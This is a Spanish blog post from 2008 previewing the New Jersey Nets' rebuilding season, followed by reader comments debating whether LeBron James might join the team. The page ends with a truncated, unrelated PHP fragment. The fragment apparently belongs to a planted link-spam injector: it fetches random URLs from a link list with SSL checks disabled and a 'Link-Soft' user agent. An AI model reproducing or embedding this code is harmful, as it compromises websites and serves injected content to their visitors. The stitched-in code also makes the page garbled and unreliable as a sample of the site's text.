New Jersey Nets: Objetivo LeBron

10 de October de 2008 por Queco

Definitivamente, los Nets se han decidido a reconstruir totalmente el equipo. El hecho de tener un magnífico trío exterior no los llevaba a nada, y han traspasado a dos de ellos, uno, el mejor de los tres, ya durante la temporada pasada. Jason Kidd voló a Dallas, y a cambio llegó Devin Harris, en lo que fue para los Mavericks una apuesta desesperada, y para los Nets una de futuro. Para seguir con el plan, durante el verano se traspasó a Richard Jefferson a los Milwaukee Bucks, a cambio de Yi Jianlian y Bobby Simmons, una vez más, apostando por el futuro -y, de paso, en la recuperación de Simmons para el baloncesto. Así que del trío magnífico queda sólo Vince Carter, y quizá debamos empezar a apostar por cuánto tiempo tardará en hacer las maletas, tanto por las posibles intenciones de la franquicia como por las propias de Carter, cuya profesionalidad quedó en entredicho cuando forzó su salida de Toronto, y no sería de extrañar un nuevo episodio del serial “baja tus números y serás rápidamente traspasado”, con el 15 de protagonista.

Para un equipo en reconstrucción siempre es importante tener suerte en el draft de rookies, y lo cierto es que a los Nets no les ha ido mal en el último. Con su pick 10 han conseguido a Brook López, que pasaba por ser el mejor de los pívots elegibles, y que en los mocks estuvo mucho tiempo en el top 5, e incluso llegó brooklopeza estar en el top 3. Y por si eso fuera poco, con su elección de segunda ronda han conseguido a Chris Douglas-Roberts, probablemente uno de los robos de este draft, y un jugador que todo el mundo pensaba que saldría en primera ronda. Así que por esta parte no hay nada de qué quejarse. Se podrían quejar de perder a Krstic, que no ha querido renovar y ha vuelto a Europa, a ganar millones, y a, dice él, demostrar que puede volver a la NBA. Pero tienen las posiciones interiores bien cubiertas, en mi opinión, sobre todo pensando que este año no aspiran a Playoffs, aunque todo sea posible en el Este. Tanto López, como Sean Williams, como Josh Boone, como el ya mencionado Yi son jóvenes prometedores, a los que un par de años de rodaje (más) vendrán muy, muy bien. Claro que para coger experiencia tendrán un buen maestro en Eduardo Nájera, que quizá no pueda enseñarles a jugar al baloncesto, pero sí a jugar en la NBA.

devinharrisnetsAsí que, con el puesto de base asignado, el de escolta, al menos temporalmente, también, y una interesante, aunque inexperta rotación de interiores, el puesto donde hay un claro desajuste es el de small forward. Ahí podría jugar Simmons, obviamente, pero está por ver lo que pueda hacer. También podría hacerlo Jarvis Hayes, que ofrece las mismas dudas, o incluso más, pues no hizo una excelente temporada en los Clippers hace tres años, que Simmons. La otra opción sería poner a Keyon Dooling de escolta, y a Carter de 3, utilizando un trío exterior con poca altura. Ninguna de las tres puede ser descartada, pues ninguna parece ser mejor que las demás. Por supuesto, si hay que mojarse, habrá que hacerlo por la opción Simmons.

Con lo que, salvo sorpresa mayúscula, los Nets se pasarán los próximos dos años sin Playoffs, intentando pescar lo mejor posible en el draft, y preparando su mudanza a Brooklyn. Y por supuesto, rezando por que la amistad de Jay-Z con LeBron James sea lo suficientemente fuerte como para que King James decida dejar Cleveland y comandar la nave de los Nets.

Quinteto: Devin Harris, Vince Carter, Bobby Simmons, Ji Yianlian y Brook Lopez

Sexto Hombre: Josh Boone

Pronóstico: Fuera de Playoffs

Comenta

8 comentarios a esta entrada

  1. portu dice:
    #1

    La jugada de Carter será difícil de volver a repetirla pq aquella vez fue demasiado descarada, así q dudo q desde NJ le permitan salir malvendiéndolo, pero el hecho de que se mantenga en el equipo tampoco creo q sea contraproducente pq se trata de un equipo en reconstrucción, pero tampoco lo es de 0, ya q un par de titulares serán jugadores con varios años de NBA como D. Harris y Boone, aparte de Carter q quizás pueda sentirse a gusto ejerciendo de teórico líder del equipo. De titular no veo a López de momento, no sólo por ser rookie, sino pq con Jianlian de 4 formarían la pareja más blanda en defensa de toda la NBA en el juego interior.

      Citar

  2. TheDeerHunter dice:
    #2

    Sin entrar a valorar la hipotética venida de El Elegido en base a razones bastante peregrinas…

    En NJ se ha hecho un inteligente trabajo este año… aunque de momento sólo vaya a servirles para luchar (o no) por evitar la cuchara de madera (que tampoco les vendría mal un nº1 del draft, por cierto)
    Valoro en NJ la determinación con la que se ha afrontado la reconstrucción y en base a ello todos los movimientos orientados a perder la mínima pegada posible ganando el máximo margen de maniobra.

    Buenísimo draft y buenísimo trade “Kidd”, aunque está por ver qué tal saldrá lo de Jefferson (e hipotéticamente hablando lo de Vicente)
    Está claro que este año será un calvario pero si siguen la línea tiene buena pinta.

      Citar

  3. Queco dice:
    #3

    Hombre, peregrinas o no, son tan buenas como cualquiera. Para mí, mejores xD

      Citar

  4. TheDeerHunter dice:
    #4

    Hombre Queco… me parece bien, pero estarás de acuerdo conmigo con que la idea de que un jugador de la categoría de Lebrón renuncie a según qué cosas por hacer un favor a un coleguilla, por muy amigos que sean, es algo que parece como mínimo alucinante ¿no crees??
    De hecho sería el primer caso así en la historia que yo sepa.

    Además, lo que yo quería decir es que no me parece lógico en estos momentos valorar las posibles hipótesis de futuro que se ciernen sobre este equipo… ya hablaremos de ello cuando llegue el momento. Ahora lo más interesante es analizar lo que hay y punto.

      Citar

  5. Jabho dice:
    #5

    Yo creo James se irá de Cleveland. Ohio y los Cavs son un mercado pequeño y Lebron en NY puede hacer estragos, así que no solo es por su amistad. Además los NJ estan en periodo de reconstrucción y a poco que se curtan Harris, Sean Williams, Lopez o Yi, mas Carter o el hueco que deje … en fin, que con una banda en los Cavs ha optado a ganar.

    Apuesto a que LeBron se irá. A NJ, NY o a otro sitio.

      Citar

  6. TheDeerHunter dice:
    #6

    Pues yo si hay que apostar…
    apuesto o por Cleveland, por el proyecto deportivo que le ofrecen y que, por cierto, le han construido casi a petición o de salir de allí NY, por razones económicos frente a las que NJ ni de lejisísimos estará capacitada para competir.
    Pero vamos… que Jay-Z la tiene que tener muy gorda si consigue llevarse a Lebrón a un nuevo equipo en Brooklin.

      Citar

  7. Queco dice:
    #7

    No estoy muy seguro de a qué exactamente renunciaría Lebron en un cambio de cleveland a brooklyn….pero bueno.

    Y en el otro tema, me parece bien que tú creas que hay que analizar lo que hay y punto, pero yo creo que el punto de lo que hay viene por las peregrinas razones del futuro, y eso hace que en mi analisis lo cite. Luego está el problema de quedarse en lo superfluo o no, no creo que Lebron se vaya a los Nets por culpa de Jay-Z, simplemente éste es un gran añadido que los demás no tienen, igual que los Knicks tienen su gran mercado como atractivo, porque lo demás… en fin, igual este es el año Knickerbocker en el horoscopo NBA.

      Citar

  8. TheDeerHunter dice:
    #8

    no sé porqué me da en la nariz que crees que en mi comentario pretendía cuestionar tu artículo… todo lo contrario, me parece bien que lo menciones porque es un rumor que se comenta mucho. Yo lo que cuestiono es la idea en sí.

    De momento Cleveland ha hecho un esfuerzo bestial por darle a Lebrón un equipo competitivo. Ahora mismo es uno de los favoritos para ganar el este y porqué no el anillo, con una inversión económica que es ahora mismo una de las más altas de toda la competición. En brooklin o en NY eso dudo mucho que lo logre al menos en un par de años vista.
    Si sale de allí será por un único motivo: la pasta.

    Tanto en un sentido como en el otro… los nets parten a priori en desventaja.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>